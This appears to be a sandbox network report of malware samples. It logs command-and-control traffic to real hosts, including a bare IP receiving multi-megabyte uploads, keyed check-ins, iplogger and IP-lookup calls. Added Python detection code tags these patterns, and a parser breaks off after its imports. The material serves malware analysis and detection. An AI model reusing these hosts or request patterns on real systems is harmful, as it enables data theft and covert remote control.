                          X-Frame-Options: DENY
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                          Host: 87.251.71.4
                          Content-Length: 137
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Content-Length: 4727
                          Content-Type: text/xml; charset=utf-8
                          Server: Microsoft-HTTPAPI/2.0
                          Date: Fri, 21 May 2021 13:35:23 GMT
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                          Host: 87.251.71.4
                          Content-Length: 1806107
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                        • flag-unknown
                          DNS
                          api.ip.sb
                          AddInProcess32.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.ip.sb
                          IN A
                          Response
                          api.ip.sb
                          IN CNAME
                          api.ip.sb.cdn.cloudflare.net
                          api.ip.sb.cdn.cloudflare.net
                          IN A
                          104.26.12.31
                          api.ip.sb.cdn.cloudflare.net
                          IN A
                          172.67.75.172
                          api.ip.sb.cdn.cloudflare.net
                          IN A
                          104.26.13.31
                        • flag-unknown
                          GET
                          https://api.ip.sb/geoip
                          AddInProcess32.exe
                          Remote address:
                          104.26.12.31:443
                          Request
                          GET /geoip HTTP/1.1
                          Host: api.ip.sb
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:35:25 GMT
                          Content-Type: application/json; charset=utf-8
                          Content-Length: 285
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          Vary: Accept-Encoding
                          Cache-Control: no-cache
                          Access-Control-Allow-Origin: *
                          CF-Cache-Status: DYNAMIC
                          cf-request-id: 0a30bc5fa00000414b733e9000000001
                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=glETeYEV309khJaMXT4uOvGI48c%2BULdA403UJkWSIAJBBWas%2FckRiWf6Zev60lrv4HpiC%2ByWM%2BXe8BfRSrnM0Za4reNu66rs8bk%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"report_to":"cf-nel","max_age":604800}
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Server: cloudflare
                          CF-RAY: 652e30129c7c414b-HAM
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                          Host: 87.251.71.4
                          Content-Length: 1806107
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                          Host: 87.251.71.4
                          Content-Length: 1806107
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                          Host: 87.251.71.4
                          Content-Length: 1806107
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                          Response
                          HTTP/1.1 200 OK
                          Content-Length: 150
                          Content-Type: text/xml; charset=utf-8
                          Server: Microsoft-HTTPAPI/2.0
                          Date: Fri, 21 May 2021 13:43:59 GMT
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                          Host: 87.251.71.4
                          Content-Length: 1806093
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                        • flag-unknown
                          DNS
                          www.facebook.com
                          gaoou.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.facebook.com
                          IN A
                          Response
                          www.facebook.com
                          IN CNAME
                          star-mini.c10r.facebook.com
                          star-mini.c10r.facebook.com
                          IN A
                          31.13.72.36
                        • flag-unknown
                          GET
                          https://www.facebook.com/
                          gaoou.exe
                          Remote address:
                          31.13.72.36:443
                          Request
                          GET / HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Sec-Fetch-Dest: document
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Site: none
                          Sec-Fetch-User: ?1
                          Upgrade-Insecure-Requests: 1
                          Host: www.facebook.com
                          Response
                          HTTP/1.1 200 OK
                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                          Cache-Control: private, no-cache, no-store, must-revalidate
                          X-Frame-Options: DENY
                          X-XSS-Protection: 0
                          Strict-Transport-Security: max-age=15552000; preload
                          X-Content-Type-Options: nosniff
                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                          Vary: Accept-Encoding
                          Pragma: no-cache
                          x-fb-rlafr: 0
                          Content-Type: text/html; charset="utf-8"
                          X-FB-Debug: c4MwX5JydJ8+RLY1bSRA8YQBR4j0yTWDOnIryeP4P8zS2Jy2yUUCqcHMno35qdRtq4OTSd0+IT8Pr8Rlz8GHmg==
                          Date: Fri, 21 May 2021 13:41:35 GMT
                          Priority: u=3,i
                          Transfer-Encoding: chunked
                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                          Connection: keep-alive
                        • flag-unknown
                          GET
                          http://uyyge5w3ye.2ihsfa.com/api/fbtime
                          gaoou.exe
                          Remote address:
                          88.218.92.148:80
                          Request
                          GET /api/fbtime HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:41:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • flag-unknown
                          POST
                          http://uyyge5w3ye.2ihsfa.com/api/?sid=491627&key=a0ccb77f02448f12b23b0501ac95e655
                          gaoou.exe
                          Remote address:
                          88.218.92.148:80
                          Request
                          POST /api/?sid=491627&key=a0ccb77f02448f12b23b0501ac95e655 HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Content-Length: 266
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:41:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • flag-unknown
                          GET
                          https://iplogger.org/18hh57
                          gaoou.exe
                          Remote address:
                          88.99.66.31:443
                          Request
                          GET /18hh57 HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Host: iplogger.org
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:41:37 GMT
                          Content-Type: image/png
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Set-Cookie: PHPSESSID=o5jtlo0bus1c9o56pl6522c2h6; path=/; HttpOnly
                          Pragma: no-cache
                          Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257443694; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Cache-Control: no-cache
                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                          Answers: 1
                          whoami: 4c38501b4c5aaf3cd2110790c1c4143772251fc8a57642aeaa13ea09d06e72a2
                          Strict-Transport-Security: max-age=31536000; preload
                          X-Frame-Options: DENY
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                          Host: 87.251.71.4
                          Content-Length: 1806093
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                          Response
                          HTTP/1.1 200 OK
                          Content-Length: 261
                          Content-Type: text/xml; charset=utf-8
                          Server: Microsoft-HTTPAPI/2.0
                          Date: Fri, 21 May 2021 13:48:15 GMT
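The entries above show two distinct beaconing patterns worth turning into detection logic: AddInProcess32.exe posting SOAP envelopes to a bare IP with SOAPAction values under http://tempuri.org/Endpoint/ (GetArguments, then multi-megabyte VerifyScanRequest and GetUpdates uploads, answered by Microsoft-HTTPAPI/2.0), and gaoou.exe cycling through a www.facebook.com fetch, a keyed /api/?sid=...&key=... check-in and an iplogger.org image fetch, with AddInProcess32.exe also querying api.ip.sb for the victim's external address. The classifier below is an added example and is not part of the tria.ge report or of any of the malware families it names. The sample records are constructed here to mirror the requests visible in the log, and the indicator rules (the tempuri.org SOAPAction prefix, the bare-IP cleartext target, the 1 MB upload threshold, the host lists and the sid/key query check) are this example's own heuristics, not sandbox signatures.

```python
"""Classify sandbox HTTP records by C2-like indicators (added example, not report code).

Each HttpRecord mirrors one entry of the network log: originating process, method,
URL and the request/response headers. SAMPLE_RECORDS is constructed for this example
from the entries visible above; the indicator rules are assumptions made here.
"""
from dataclasses import dataclass, field
from urllib.parse import urlparse


@dataclass
class HttpRecord:
    process: str
    method: str
    url: str
    request: dict = field(default_factory=dict)   # request header name -> value
    response: dict = field(default_factory=dict)  # response header name -> value


# Constructed to match entries in the log above (values copied from the visible headers).
SAMPLE_RECORDS = [
    HttpRecord("AddInProcess32.exe", "POST", "http://87.251.71.4//",
               {"Content-Type": "text/xml; charset=utf-8",
                "SOAPAction": '"http://tempuri.org/Endpoint/GetArguments"',
                "Content-Length": "137"},
               {"Server": "Microsoft-HTTPAPI/2.0", "Content-Length": "4727"}),
    HttpRecord("AddInProcess32.exe", "POST", "http://87.251.71.4//",
               {"Content-Type": "text/xml; charset=utf-8",
                "SOAPAction": '"http://tempuri.org/Endpoint/VerifyScanRequest"',
                "Content-Length": "1806107"}),
    HttpRecord("AddInProcess32.exe", "GET", "https://api.ip.sb/geoip",
               {}, {"Content-Type": "application/json; charset=utf-8"}),
    HttpRecord("gaoou.exe", "GET", "https://iplogger.org/18hh57",
               {"viewport-width": "1920"}, {"Content-Type": "image/png"}),
    HttpRecord("gaoou.exe", "POST",
               "http://uyyge5w3ye.2ihsfa.com/api/?sid=486563&key=05b44e597079906fcc1d90d00559969d",
               {"Content-Type": "application/x-www-form-urlencoded", "Content-Length": "266"}),
    HttpRecord("gaoou.exe", "GET", "https://www.facebook.com/",
               {"Sec-Fetch-Dest": "document"}, {"Content-Type": 'text/html; charset="utf-8"'}),
]

# Assumed host lists for this example; extend from your own intel.
IP_LOOKUP_HOSTS = {"api.ip.sb"}
TRACKER_HOSTS = {"iplogger.org"}
LARGE_UPLOAD_BYTES = 1_000_000  # assumed threshold for "this is exfil, not a heartbeat"


def _header(headers, name):
    """Case-insensitive header lookup; returns None when absent."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return None


def classify(rec):
    """Return the list of indicator tags for one record, in evaluation order."""
    tags = []
    u = urlparse(rec.url)
    host = u.hostname or ""
    soap = (_header(rec.request, "SOAPAction") or "").strip('"')
    # WCF-style SOAP call using the default tempuri.org namespace: tag it by operation name.
    if rec.method == "POST" and soap.startswith("http://tempuri.org/Endpoint/"):
        tags.append("soap-c2:" + soap.rsplit("/", 1)[-1])
        # Cleartext HTTP straight to a literal IPv4 address, no hostname involved.
        if u.scheme == "http" and host.replace(".", "").isdigit():
            tags.append("c2-bare-ip")
    # Multi-megabyte request bodies to the same endpoint are candidate data exfiltration.
    try:
        if int(_header(rec.request, "Content-Length") or 0) > LARGE_UPLOAD_BYTES:
            tags.append("large-upload")
    except ValueError:
        pass
    if host in IP_LOOKUP_HOSTS:
        tags.append("external-ip-lookup")
    # A tracker host answering with an image is the classic logging pixel.
    if host in TRACKER_HOSTS and (_header(rec.response, "Content-Type") or "").startswith("image/"):
        tags.append("tracking-pixel")
    # Form POST whose query carries a session id and a per-request key.
    if rec.method == "POST" and "sid=" in u.query and "key=" in u.query:
        tags.append("keyed-checkin")
    return tags


def summarize(records):
    """Map each process name to the set of indicator tags seen across its records."""
    out = {}
    for rec in records:
        for t in classify(rec):
            out.setdefault(rec.process, set()).add(t)
    return out


if __name__ == "__main__":
    for proc, tags in summarize(SAMPLE_RECORDS).items():
        print(proc, sorted(tags))
```

The plain www.facebook.com fetch deliberately yields no tag: it carries a normal browser header set and is indistinguishable from user traffic on its own, which is why the rules key on the SOAPAction value, the bare-IP cleartext target and the upload size rather than on destination reputation alone. Run per process and the SOAP tags cluster on AddInProcess32.exe while the tracker and keyed check-in cluster on gaoou.exe, matching the split visible in the log.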
                        • flag-unknown
                          DNS
                          www.facebook.com
                          gaoou.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.facebook.com
                          IN A
                          Response
                          www.facebook.com
                          IN CNAME
                          star-mini.c10r.facebook.com
                          star-mini.c10r.facebook.com
                          IN A
                          31.13.83.36
                        • flag-unknown
                          GET
                          https://www.facebook.com/
                          gaoou.exe
                          Remote address:
                          31.13.83.36:443
                          Request
                          GET / HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Sec-Fetch-Dest: document
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Site: none
                          Sec-Fetch-User: ?1
                          Upgrade-Insecure-Requests: 1
                          Host: www.facebook.com
                          Response
                          HTTP/1.1 200 OK
                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                          Cache-Control: private, no-cache, no-store, must-revalidate
                          X-Frame-Options: DENY
                          X-XSS-Protection: 0
                          Strict-Transport-Security: max-age=15552000; preload
                          X-Content-Type-Options: nosniff
                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                          Vary: Accept-Encoding
                          Pragma: no-cache
                          x-fb-rlafr: 0
                          Content-Type: text/html; charset="utf-8"
                          X-FB-Debug: JPj66tyFuq1fsUkXT9NSX2UUIuDk8tw2Bc/DLMK2uPNdxfQnCFCB9gULnpoeMdZ9JwjEclg+NmCWd3cmSsHnUw==
                          Date: Fri, 21 May 2021 13:51:39 GMT
                          Transfer-Encoding: chunked
                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                          Connection: keep-alive
                        • flag-unknown
                          GET
                          http://uyyge5w3ye.2ihsfa.com/api/fbtime
                          gaoou.exe
                          Remote address:
                          88.218.92.148:80
                          Request
                          GET /api/fbtime HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:51:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • POST http://uyyge5w3ye.2ihsfa.com/api/?sid=496635&key=4948c6f38001a87cebb57fbeffe58fac  (gaoou.exe → 88.218.92.148:80)
                          Request
                          POST /api/?sid=496635&key=4948c6f38001a87cebb57fbeffe58fac HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Content-Length: 266
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:51:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • GET https://iplogger.org/18hh57  (gaoou.exe → 88.99.66.31:443)
                          Request
                          GET /18hh57 HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Host: iplogger.org
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:51:41 GMT
                          Content-Type: image/png
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Set-Cookie: PHPSESSID=o9tiipdpr1b192lmo4729ij283; path=/; HttpOnly
                          Pragma: no-cache
                          Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257443090; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Cache-Control: no-cache
                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                          Answers: 1
                          whoami: 4c38501b4c5aaf3cd2110790c1c4143772251fc8a57642aeaa13ea09d06e72a2
                          Strict-Transport-Security: max-age=31536000; preload
                          X-Frame-Options: DENY
                        Network flows (each entry: destination, URL or name; then protocols | process | bytes sent / received | packets sent / received; then each request and the status it received)
                        • 217.107.34.191:443  https://ma.pycharm3.ru/SystemRuntimeSerializationXmlFormatWriterGenerator80419
                          tls, http | ABCbrow.exe | 4.1kB / 221.1kB | 80 / 151
                          GET https://ma.pycharm3.ru/SystemRuntimeSerializationXmlFormatWriterGenerator80419 → 200
                        • 101.36.107.74:80  http://101.36.107.74/seemorebty/il.php?e=jg6_6asg
                          http | jg6_6asg.exe | 690 B / 487 B | 6 / 5
                          GET http://101.36.107.74/seemorebty/il.php?e=jg6_6asg → 200
                        • 88.99.66.31:443  https://iplogger.org/ZhvS4
                          tls, http | jg6_6asg.exe | 1.2kB / 7.1kB | 10 / 10
                          GET https://iplogger.org/ZhvS4 → 200
                        • 208.95.112.1:80  http://ip-api.com/json/?fields=8198
                          http | SystemNetworkService | 1.7kB / 1.2kB | 11 / 7
                          GET http://ip-api.com/json/?fields=8198 → 200 (4 times)
                        • 208.95.112.1:80  http://ip-api.com/json/
                          http | gaoou.exe | 774 B / 632 B | 6 / 3
                          GET http://ip-api.com/json/ → 200
                        • 104.21.21.221:80  http://iw.gamegame.info/report7.4.php
                          http | SystemNetworkService | 2.3kB / 2.6kB | 13 / 11
                          POST http://iw.gamegame.info/report7.4.php → 200 (3 times)
                        • 87.251.71.4:80  http://87.251.71.4//
                          http | AddInProcess32.exe | 548 B / 172 B | 4 / 4
                          POST http://87.251.71.4// → (no response)
                        • 172.67.200.215:80  http://ol.gamegame.info/report7.4.php
                          http | SystemNetworkService | 916 B / 921 B | 7 / 5
                          POST http://ol.gamegame.info/report7.4.php → 200
                        • 157.240.210.35:443  https://www.facebook.com/
                          tls, http | gaoou.exe | 10.7kB / 507.9kB | 198 / 369
                          GET https://www.facebook.com/ → 200 (2 times)
                        • 88.218.92.148:80  http://uyyge5w3ye.2ihsfa.com/api/?sid=486563&key=05b44e597079906fcc1d90d00559969d
                          http | gaoou.exe | 1.2kB / 801 B | 8 / 7
                          GET http://uyyge5w3ye.2ihsfa.com/api/fbtime → 200
                          POST http://uyyge5w3ye.2ihsfa.com/api/?sid=486563&key=05b44e597079906fcc1d90d00559969d → 200
                        • 88.99.66.31:443  https://iplogger.org/18hh57
                          tls, http | gaoou.exe | 1.3kB / 6.3kB | 10 / 11
                          GET https://iplogger.org/18hh57 → 200
                        • 87.251.71.4:80  http://87.251.71.4//
                          http | AddInProcess32.exe | 153.1kB / 7.6kB | 117 / 68
                          POST http://87.251.71.4// → 200
                          POST http://87.251.71.4// → (no response)
                        • 104.26.12.31:443  https://api.ip.sb/geoip
                          tls, http | AddInProcess32.exe | 753 B / 4.2kB | 9 / 9
                          GET https://api.ip.sb/geoip → 200
                        • 87.251.71.4:80  http://87.251.71.4//
                          http | AddInProcess32.exe | 152.0kB / 2.5kB | 112 / 62
                          POST http://87.251.71.4// → (no response)
                        • 87.251.71.4:80  http://87.251.71.4//
                          http | AddInProcess32.exe | 152.0kB / 2.5kB | 112 / 62
                          POST http://87.251.71.4// → (no response)
                        • 87.251.71.4:80  http://87.251.71.4//
                          http | AddInProcess32.exe | 3.7MB / 47.7kB | 2488 / 1183
                          POST http://87.251.71.4// → 200
                          POST http://87.251.71.4// → (no response)
                        • 31.13.72.36:443  https://www.facebook.com/
                          tls, http | gaoou.exe | 5.8kB / 255.9kB | 106 / 189
                          GET https://www.facebook.com/ → 200
                        • 88.218.92.148:80  http://uyyge5w3ye.2ihsfa.com/api/?sid=491627&key=a0ccb77f02448f12b23b0501ac95e655
                          http | gaoou.exe | 1.2kB / 793 B | 8 / 7
                          GET http://uyyge5w3ye.2ihsfa.com/api/fbtime → 200
                          POST http://uyyge5w3ye.2ihsfa.com/api/?sid=491627&key=a0ccb77f02448f12b23b0501ac95e655 → 200
                        • 88.99.66.31:443  https://iplogger.org/18hh57
                          tls, http | gaoou.exe | 1.4kB / 6.4kB | 11 / 12
                          GET https://iplogger.org/18hh57 → 200
                        • 87.251.71.4:80  http://87.251.71.4//
                          http | AddInProcess32.exe | 1.9MB / 26.9kB | 1250 / 661
                          POST http://87.251.71.4// → 200
                        • 31.13.83.36:443  https://www.facebook.com/
                          tls, http | gaoou.exe | 5.9kB / 256.0kB | 107 / 189
                          GET https://www.facebook.com/ → 200
                        • 88.218.92.148:80  http://uyyge5w3ye.2ihsfa.com/api/?sid=496635&key=4948c6f38001a87cebb57fbeffe58fac
                          http | gaoou.exe | 1.2kB / 841 B | 8 / 8
                          GET http://uyyge5w3ye.2ihsfa.com/api/fbtime → 200
                          POST http://uyyge5w3ye.2ihsfa.com/api/?sid=496635&key=4948c6f38001a87cebb57fbeffe58fac → 200
                        • 88.99.66.31:443  https://iplogger.org/18hh57
                          tls, http | gaoou.exe | 1.4kB / 6.4kB | 11 / 12
                          GET https://iplogger.org/18hh57 → 200
                        • 8.8.8.8:53  email.yg9.me
                          dns | SystemNetworkService | 58 B / 74 B | 1 / 1
                          DNS email.yg9.me → 198.13.62.186
                        • 8.8.8.8:53  email.yg9.me
                          dns | SystemNetworkService | 58 B / 129 B | 1 / 1
                          DNS email.yg9.me → (no answer recorded)
                        • 198.13.62.186:53  email.yg9.me
                          (no protocol listed) | SystemNetworkService | 59.4kB / 628.9kB | 1124 / 1125
                        • 8.8.8.8:53  ma.pycharm3.ru
                          dns | ABCbrow.exe | 60 B / 76 B | 1 / 1
                          DNS ma.pycharm3.ru → 217.107.34.191
                        • 8.8.8.8:53  iplogger.org
                          dns | gaoou.exe | 58 B / 74 B | 1 / 1
                          DNS iplogger.org → 88.99.66.31
                        • 8.8.8.8:53  ip-api.com
                          dns | gaoou.exe | 56 B / 72 B | 1 / 1
                          DNS ip-api.com → 208.95.112.1
                        • 8.8.8.8:53  iw.gamegame.info
                          dns | SystemNetworkService | 62 B / 94 B | 1 / 1
                          DNS iw.gamegame.info → 104.21.21.221, 172.67.200.215
                        • 8.8.8.8:53  ol.gamegame.info
                          dns | SystemNetworkService | 62 B / 94 B | 1 / 1
                          DNS ol.gamegame.info → 172.67.200.215, 104.21.21.221
                        • 8.8.8.8:53  www.facebook.com
                          dns | gaoou.exe | 62 B / 107 B | 1 / 1
                          DNS www.facebook.com → 157.240.210.35
                        • 8.8.8.8:53  uyyge5w3ye.2ihsfa.com
                          dns | gaoou.exe | 67 B / 83 B | 1 / 1
                          DNS uyyge5w3ye.2ihsfa.com → 88.218.92.148
                        • 8.8.8.8:53  api.ip.sb
                          dns | AddInProcess32.exe | 55 B / 145 B | 1 / 1
                          DNS api.ip.sb → 104.26.12.31, 172.67.75.172, 104.26.13.31
                        • 8.8.8.8:53  www.facebook.com
                          dns | gaoou.exe | 62 B / 107 B | 1 / 1
                          DNS www.facebook.com → 31.13.72.36
                        • 8.8.8.8:53  www.facebook.com
                          dns | gaoou.exe | 62 B / 107 B | 1 / 1
                          DNS www.facebook.com → 31.13.83.36

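                        The flow table above is a flattened export, and its fields are easiest to reason about once parsed. The Python below is an added example, not Triage's own code and not part of the original report: it reads records in exactly the layout shown above (destination, URL or name, an optional protocol line, process, four numeric columns, then request/response pairs) and applies four heuristic checks a practitioner would run over the result. The checks are assumptions of this example, not findings of the report: contact with the IP-lookup services that appear above (ip-api.com, api.ip.sb, iplogger.org), plaintext HTTP to a bare IP literal, a destination that receives far more than it returns (the 3.7MB POSTed to 87.251.71.4 by AddInProcess32.exe), and port-53 traffic far larger than name lookups need (the 59.4kB / 628.9kB exchange with 198.13.62.186:53). Reading the four unlabelled numbers as bytes sent, bytes received, packets sent, packets received is also an assumption, consistent with the 58 B query / 74 B answer sizes of the DNS records; the thresholds are arbitrary and the sample records are copied from the table.

```python
"""Parse Triage's flattened network table ('•' per record, one field per line)
and flag flows worth a closer look.  Added example, not Triage's own code.
Assumed (not stated on the page): the four unlabeled numbers are bytes sent,
bytes received, packets sent, packets received; sizes use SI units (kB = 1000 B)."""
import ipaddress
import re
from collections import namedtuple
from urllib.parse import urlparse

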